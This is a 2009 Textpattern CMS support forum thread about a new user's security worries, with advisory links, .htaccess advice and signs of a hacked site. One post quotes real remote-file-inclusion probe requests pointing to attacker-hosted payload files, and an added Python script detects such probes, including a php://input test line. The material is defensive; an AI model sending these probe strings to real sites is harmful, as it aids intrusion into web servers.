Textpattern CMS support forum
#16 2009-08-14 11:26:23
- sarah
- Member
- Registered: 2009-08-13
- Posts: 46
Re: How to begin setup installation
Els, hcgtv and Ruud, here are the sites referencing Textpattern's security bugs:
http://www.securityfocus.com/bid/27606/discuss
Textpattern is prone to multiple security vulnerabilities, including cross-site scripting issues, an HTML-injection issue, and a denial-of-service issue.
A successful exploit could allow an attacker to deny service to legitimate users, execute arbitrary HTML and script code in the context of the affected site, or execute arbitrary script code in the browser of an unsuspecting user. Other attacks are also possible.
These issues affect Textpattern 4.0.5; other versions may also be vulnerable.
http://secunia.com/advisories/28793/
#17 2009-08-14 11:31:29
- sarah
- Member
- Registered: 2009-08-13
- Posts: 46
Re: How to begin setup installation
Mattd, you asked what was in my .htaccess file; well, there are two .htaccess files.
The one which is there upon installation, and the other one in the "myadmin" folder, which I created, is basically the security code which comes from Textpattern's web page on "how to make Textpattern more secure".
The code in the latter .htaccess file is almost identical to the code that hcgtv posted, on post 14.
#18 2009-08-14 11:40:38
- sarah
- Member
- Registered: 2009-08-13
- Posts: 46
Re: How to begin setup installation
Hcgtv,
In regards to PHPXref, I take it that this is the site you got the software from:
http://phpxref.com/
Can you tell me exactly what you downloaded to view visitor logs?
It's comforting to know that the buggy scripts that hackers use are unsuccessful in intruding into your site.
It's just that Textpattern, which doesn't seem to be as popular as "CMS Made Simple", seems to have had more known bugs than CMS Made Simple.
I was concerned…
Re: How to begin setup installation
sarah wrote:
It's just that Textpattern, which doesn't seem to be as popular as "CMS Made Simple", seems to have had more known bugs than CMS Made Simple.
I highly doubt that. Did you look at CMS Made Simple's Secunia statistics? It has WAY more. http://secunia.com/advisories/26928/
Re: How to begin setup installation
sarah wrote:
Can you tell me exactly what you downloaded to view visitor logs?
Textpattern has a tab in the backend that lets you see who’s visited your site.
Let me give you examples of what I see:
211.75.220.49 index.php?c=http://pekipug.com/id1.txt??
131.203.76.246 index.php?themesdir=http://www.edu-math.com/upload_question_images/fx29id1.txt?
211.75.220.49 index.php?template=http://pekipug.com/id1.txt??
190.144.44.36 /?page=http://www.freewebtown.com/fucku8/fx29id1.txt??
64.202.120.88 /index.php?page=http://www.oming.com//master-id.txt?
Those are just some I picked from the last hour; this kind of stuff goes on all day. If Textpattern was vulnerable, as the links you provide say, don't you think my site would have been hacked by now?
We Love TXP . TXP Themes . TXP Tags . TXP Planet . TXP Make
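The request lines hcgtv pasted above are remote-file-inclusion (RFI) scans: each one hands a URL to a query parameter (c, themesdir, template, page) that some other PHP application is known to pass straight into include(). A site is only exposed if it really does use that parameter that way and the host lets include() fetch URLs (allow_url_include on PHP 5.2 and later, allow_url_fopen before that), which is why they bounce off an installation like his. The script below is an added example, not code from the forum posts or from the Textpattern project. It flags such probes in a log of the shape hcgtv quoted ("client-ip request"); the five scan lines are the ones he posted, the two 203.0.113.7 lines are constructed, and the detection rule itself (a parameter value that is an absolute URL, a PHP stream wrapper, or a directory-traversal string) is an assumption, not Textpattern's logic.

```python
"""Flag remote-file-inclusion probes in visitor-log lines of the form "<ip> <request>".

Added example, not code from the Textpattern project or the forum thread.
The classification rule below is this example's own assumption.
"""
import re
from collections import Counter
from typing import Dict, List, Optional, Tuple
from urllib.parse import parse_qsl, unquote, urlsplit

# Schemes an attacker hands to include()/require() hoping URL includes are enabled.
REMOTE_SCHEMES = {"http", "https", "ftp", "ftps"}
# PHP stream wrappers that reach include() without any network fetch.
PHP_WRAPPERS = ("php://", "data:", "expect://", "phar://")

LINE_RE = re.compile(r"^(?P<ip>\d{1,3}(?:\.\d{1,3}){3})\s+(?P<req>\S+)$")

# Sample log: five lines from hcgtv's post plus two constructed lines
# (a benign article request and a php:// wrapper probe).
SAMPLE_LOG = """\
211.75.220.49 index.php?c=http://pekipug.com/id1.txt??
131.203.76.246 index.php?themesdir=http://www.edu-math.com/upload_question_images/fx29id1.txt?
211.75.220.49 index.php?template=http://pekipug.com/id1.txt??
190.144.44.36 /?page=http://www.freewebtown.com/fucku8/fx29id1.txt??
64.202.120.88 /index.php?page=http://www.oming.com//master-id.txt?
203.0.113.7 /index.php?s=article&id=12
203.0.113.7 /?page=php://input
"""


def classify_value(value: str) -> Optional[str]:
    """Return 'remote', 'wrapper' or 'traversal' for a suspicious value, else None."""
    v = unquote(value)
    if v.lower().startswith(PHP_WRAPPERS):
        return "wrapper"
    parts = urlsplit(v)
    if parts.scheme.lower() in REMOTE_SCHEMES and parts.netloc:
        return "remote"
    if "../" in v or "..\\" in v:
        return "traversal"
    return None


def analyse_line(line: str) -> List[Dict]:
    """Parse one log line and return a finding per suspicious query parameter."""
    m = LINE_RE.match(line.strip())
    if not m:
        return []
    ip, req = m.group("ip"), m.group("req")
    path, _, query = req.partition("?")
    findings = []
    for param, value in parse_qsl(query, keep_blank_values=True):
        kind = classify_value(value)
        if kind is None:
            continue
        target = urlsplit(unquote(value))
        findings.append({
            "ip": ip,
            "path": path,
            "param": param,
            "kind": kind,
            "host": target.netloc,          # where the payload is hosted
            "payload_path": target.path,    # usually a .txt holding PHP code
            # A trailing '?' (often doubled) makes anything the vulnerable script
            # appends after the parameter land in the remote URL's query string,
            # so the fetched file is still the attacker's .txt.
            "terminates_path": value.endswith("?"),
        })
    return findings


def analyse_log(text: str) -> Tuple[List[Dict], Counter]:
    """Run analyse_line over every line; also count probes per source IP."""
    findings = [f for line in text.splitlines() for f in analyse_line(line)]
    return findings, Counter(f["ip"] for f in findings)


if __name__ == "__main__":
    hits, per_ip = analyse_log(SAMPLE_LOG)
    for f in hits:
        print(f"{f['ip']:16} {f['kind']:9} {f['param']}= {f['host']}{f['payload_path']}")
    print("probes per source:", dict(per_ip))
```

The per-IP counter is the part you would act on: a source that sends several of these in a short window is a scanner, and the list of hosts in `host` tells you where the payloads live. The example deliberately does not try to decide whether your own index.php is exploitable; that depends on the application, which is exactly hcgtv's point.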
Re: How to begin setup installation
sarah wrote:
Els, hcgtv and Ruud, here are the sites referencing Textpattern's security bugs:
http://www.securityfocus.com/bid/27606/discuss
Textpattern is prone to multiple security vulnerabilities, including cross-site scripting issues, an HTML-injection issue, and a denial-of-service issue.
A successful exploit could allow an attacker to deny service to legitimate users, execute arbitrary HTML and script code in the context of the affected site, or execute arbitrary script code in the browser of an unsuspecting user. Other attacks are also possible.
These issues affect Textpattern 4.0.5; other versions may also be vulnerable.
http://secunia.com/advisories/28793/
thanks for the links!
In fact, these sites confirm that Textpattern is very secure! There's been only one discovered (mild) vulnerability over the years, in Textpattern 4.0.5.
Some lists of vulnerabilities:
Textpattern
Wordpress
CMS Made Simple
As said in the disclaimer, don't compare software by the number of found vulnerabilities. The important part is the developers' reactivity in correcting them.
Last edited by PascalL (2009-08-14 13:11:57)
#22 2009-08-14 13:27:14
- sarah
- Member
- Registered: 2009-08-13
- Posts: 46
Re: How to begin setup installation
iblastoff wrote:
I highly doubt that. Did you look at CMS Made Simple's Secunia statistics? It has WAY more. http://secunia.com/advisories/26928/
I see…
It’s just I couldn’t find any sites referencing CMS Made Simple’s bugs when doing a google search…
#23 2009-08-14 13:32:14
- sarah
- Member
- Registered: 2009-08-13
- Posts: 46
Re: How to begin setup installation
hcgtv,
Thank you so much for the info you provided about the tab in Textpattern with the text files hackers try to input into your site!
But what does "PHPXref" do for you, and how?
Also, what are the signs that your site has been hacked?
Thanks!
#24 2009-08-14 13:42:46
- sarah
- Member
- Registered: 2009-08-13
- Posts: 46
Re: How to begin setup installation
PascalL, thanks for the links to the site you posted.
You’re right- CMS Made Simple is worse than Textpattern.
Going by the info on the links of the site you provided, these are how the vulnerabilities of “Textpattern” compare to “CMS Made Simple’s” vulnerabilities:
http://secunia.com/advisories/product/17462/?task=advisories
http://secunia.com/advisories/product/13129/?task=advisories
Textpattern: 1 Secunia advisories 3 Vulnerabilities
CMS Made Simple: 7 Secunia advisories 13 Vulnerabilities
Last edited by sarah (2009-08-14 14:14:11)
Re: How to begin setup installation
sarah,
Txp IS vulnerable to attacks, like ALL software. I've been using it since its early beta stages and I did see sites which have been hacked successfully. A search in this forum will return such successful (or not) attempts. Such a search will also reveal that a lot of the successful attacks were due to 3rd-party software installed and not due to txp or its plugins. It will also reveal the serious interest of our developers in closing all security vulnerabilities.
Everybody here takes security seriously and I'm sure you do too, BUT do you change your passwords regularly? Once a day/week/month/year? In all honesty I doubt that most people do.
Signs of hacked txp: Content not entered by user, extra code in parsed pages.
Yiannis
——————————
NeMe | hblack.art | EMAP | A Sea change | Toolkit of Care
I do my best editing after I click on the submit button.
Re: How to begin setup installation
sarah wrote:
But what does "PHPXref" do for you, and how?
PHPXref is a resource for PHP programmers. It allows you to view the source behind Open Source projects like Textpattern.
Also, what are the signs that your site has been hacked?
The site doesn’t look the same, you notice something out of place, you can’t sign on, etc. Getting hacked takes on many variations, from a complete defacement to a nuisance link placed in a footer.
Keep in mind, as Colak points out, you’re as safe as your environment. Any other web app you may install, forums, galleries, calendars, etc., have to go through the same scrutiny as you have placed Textpattern through. On shared hosting accounts, one person getting hacked could bring others down also.
We Love TXP . TXP Themes . TXP Tags . TXP Planet . TXP Make
Re: How to begin setup installation
sarah wrote:
Els, hcgtv and Ruud, here are the sites referencing Textpattern's security bugs:
http://www.securityfocus.com/bid/27606/discuss
Textpattern is prone to multiple security vulnerabilities, including cross-site scripting issues, an HTML-injection issue, and a denial-of-service issue.
A successful exploit could allow an attacker to deny service to legitimate users, execute arbitrary HTML and script code in the context of the affected site, or execute arbitrary script code in the browser of an unsuspecting user. Other attacks are also possible.
These issues affect Textpattern 4.0.5; other versions may also be vulnerable.
http://secunia.com/advisories/28793/
These vulnerabilities were all fixed in TXP 4.0.6 and renaming the textpattern directory wouldn’t increase security (not even by obscuring) if you were using TXP 4.0.5.
The only vulnerability that Secunia lists as not fixed is not a bug but a feature. You can use <script> tags in the body of an article. Anonymous visitors cannot publish articles.
#28 2009-08-14 18:09:58
- sarah
- Member
- Registered: 2009-08-13
- Posts: 46
Re: How to begin setup installation
colak wrote:
sarah, Txp IS vulnerable to attacks, like ALL software. I've been using it since its early beta stages and I did see sites which have been hacked successfully. A search in this forum will return such successful (or not) attempts. Such a search will also reveal that a lot of the successful attacks were due to 3rd-party software installed and not due to txp or its plugins. It will also reveal the serious interest of our developers in closing all security vulnerabilities. Everybody here takes security seriously and I'm sure you do too, BUT do you change your passwords regularly? Once a day/week/month/year? In all honesty I doubt that most people do. Signs of hacked txp: Content not entered by user, extra code in parsed pages.
Thanks for the info Colak.
Yes, my host provider advises that users change their passwords at least every 6 months, so that does increase site security.
#29 2009-08-14 18:18:02
- sarah
- Member
- Registered: 2009-08-13
- Posts: 46
Re: How to begin setup installation
HCGTV, in regards to the very helpful .htaccess code you’ve supplied for me on the previous page, one more question please:
During the installation of Textpattern, once your username etc. has been entered, code is supplied for the index.php document.
Is there any way to make this even more secure?
Also, in regards to the .htaccess code you've supplied, may I ask whereabouts exactly I put this file?
When you install Textpattern, the folder setup you get is: textpattern 4.0.8 > textpattern > etc.
Whereabouts do I put the file, and do I need to delete the folder named "textpattern 4.0.8"?
Thanks!
Last edited by sarah (2009-08-14 18:22:10)
Re: How to begin setup installation
sarah wrote:
Also, in regards to the .htaccess code you've supplied, may I ask whereabouts exactly I put this file?
The layout of a Textpattern install is:
/files
/images
/rpc
/textpattern
The .htaccess would go into /textpattern.
We Love TXP . TXP Themes . TXP Tags . TXP Planet . TXP Make